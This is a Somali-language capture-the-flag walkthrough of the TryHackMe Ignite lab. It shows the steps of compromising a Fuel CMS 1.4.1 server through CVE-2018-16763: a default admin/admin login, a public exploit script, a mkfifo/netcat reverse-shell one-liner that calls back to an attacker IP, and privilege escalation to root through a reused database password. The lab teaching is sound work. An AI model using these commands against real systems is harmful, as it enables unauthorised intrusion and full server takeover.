Sida loo Hacking Gareyo TryHackMe Ignite CTF
Ignite CTF Walkthrough — Fuel CMS RCE (CVE-2018-16763)
Hordhac
Maqaalkani waa walkthrough dhamaystiran oo ku saabsan mashiinka Ignite. Waxaan diiradda saaraynaa sida loo helo, loo fahmo, loona isticmaalo nuglaanta Remote Code Execution (RCE) ee Fuel CMS v1.4.1.
Waxaan sidoo kale sharaxeynaa dhammaan concepts-ka muhiimka ah sida:
- Enumeration
- RCE (Remote Code Execution)
- Reverse Shell
- Privilege Escalation
Mawduucyada Muhiimka ah
- Enumeration → Ururinta macluumaadka target-ka
- Exploitation → Ka faa’iidaysiga vulnerability
- Post Exploitation → Helitaanka system control
- Privilege Escalation → Ka gudbid user → root
1: SCANNING
Maxay tahay Scanning?
Scanning waa marxaladda koowaad ee penetration testing. Waxay kuu sheegaysaa:
- Ports furan
- Services socda
- Software version-ka
Ujeeddadu waa in la fahmo “waxa system-ku bixiyo”.
Nmap Scan
nmap -sV -A -T4 10.81.139.78
Macnaha:
-sV→ Waxay ogaataa version-ka service-ka-A→ OS detection + scripts + deeper scan-T4→ Scan degdeg ah
Haddii version duug ah la helo → waxaa suuragal ah exploit.

2: FOOTHOLD
Maxaa la helay?
Port 80 (HTTP) waa furan → website ayaa jira.
http://10.81.139.78

Credentials la helay
- Username:
admin - Password:
admin
Maxay tani tahay?
Tani waa Default Credentials
Sharaxaad:
Default credentials waa passwords hore loo sii dejiyey (example admin/admin).
- Aad bay halis u yihiin
- Weerar kasta ayaa si fudud u isticmaali kara
Login Access
http://10.81.139.78/fuel


3: EXPLOITATION
Maxay tahay RCE?
RCE (Remote Code Execution) waa nugulaan u ogolaanaysa attacker:
inuu si toos ah u fuliyo commands server-ka
Tusaale:
whoamilscat file
Waxaas oo dhan server-ka ayaa kuu fulinaya.
Helitaanka exploit
searchsploit FUEL CMS 1.4

Exploit execution
python 50477.py -u http://10.91.139.78/
whoami
ls
pwd
Maxaa dhacaya?
- Script-ku wuxuu ka faa’iidaystaa vulnerability
- Wuxuu ku siinayaa command execution
4: POST EXPLOITATION
Maxay tahay Reverse Shell?
Reverse Shell waa:
system-ka target-ka oo ku soo xirma attacker-ka
Si fudud:
- Adiga ma gelaysid server-ka
- Server-ka ayaa kuu soo xirmaya
Waxaad helaysaa terminal interactive ah.
Listener (attacker side)
nc -lvnp 4444
TTY upgrade
python -c 'import pty; pty.spawn("/bin/bash")'
Reverse shell payload
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 192.168.219.158 1111 >/tmp/f

5: PRIVILEGE ESCALATION
Maxay tahay Privilege Escalation?
Privilege Escalation waa:
ka gudbid user caadi ah → user awood sare leh (root)
Tusaale:
www-data→ user caadi ahroot→ admin buuxa
Root wuxuu leeyahay full control system-ka.
LinPEAS
Tool loo isticmaalo in lagu helo weaknesses.
./linpeas.sh

Helitaanka password
cat /var/www/html/fuel/application/config/database.php

Root Access
su root
Haddii password sax yahay → waxaad noqonaysaa ROOT
ROOT FLAG
cat /root/root.txt

Gunaanad
Khaladaadka la helay
- Default credentials
- Software duug ah (Fuel CMS 1.4.1)
- Password plaintext
- Password reuse
Casharka ugu muhiimsan
- Scanning → faham system-ka
- Exploitation → ka faa’iidayso vulnerability
- Reverse shell → hel terminal buuxa
- Privilege escalation → gaadh root
AlphaSploit Insight
Amniga ma aha hal khalad — waa chain of mistakes.
Haddii hal link jabto → system-ka oo dhan wuu dhacaa.
Was this article helpful?
License
This article is licensed under Creative Commons Attribution–NonCommercial 4.0 International (CC BY-NC 4.0). You may share and adapt this content for educational and non-commercial purposes with proper attribution to AlphaSploit.
Continue Reading
Waa maxay Computer Network?
Maalin kasta waxaan isticmaalnaa internet-ka si aan u dirno farriimo, u daawanno muuqaallo, u wadaagno faylal, ama aan u qabanno shirar muuqaal ah. Adeegyadan oo dhan waxay ku shaqeeyaan **Computer Network**. Laakiin waa maxay, sideese u shaqeeyaa, iyo maxaa loo baahan yahay inaad ka fahanto?
Sida Logu shubo Kali Linux VirtualBox
Hagahan wuxuu kuu sharxayaa talaabo kasta oo aad ugu shubi karto Kali Linux VirtualBox adigoo isticmaalaya Windows 11. Bar sida loo sameeyo VM-ka, loo qoondeeyo RAM iyo CPU, loona
Waa Maxay Ethical Hacking?
**Ethical Hacking** (Hacking-ka Sharciga ah ama Sharafta leh) waa nidaam si sharci ah loogu dhex jaro nidaamyada kumbuyuutarrada, mareegaha (websites), iyo shabakadaha (networks).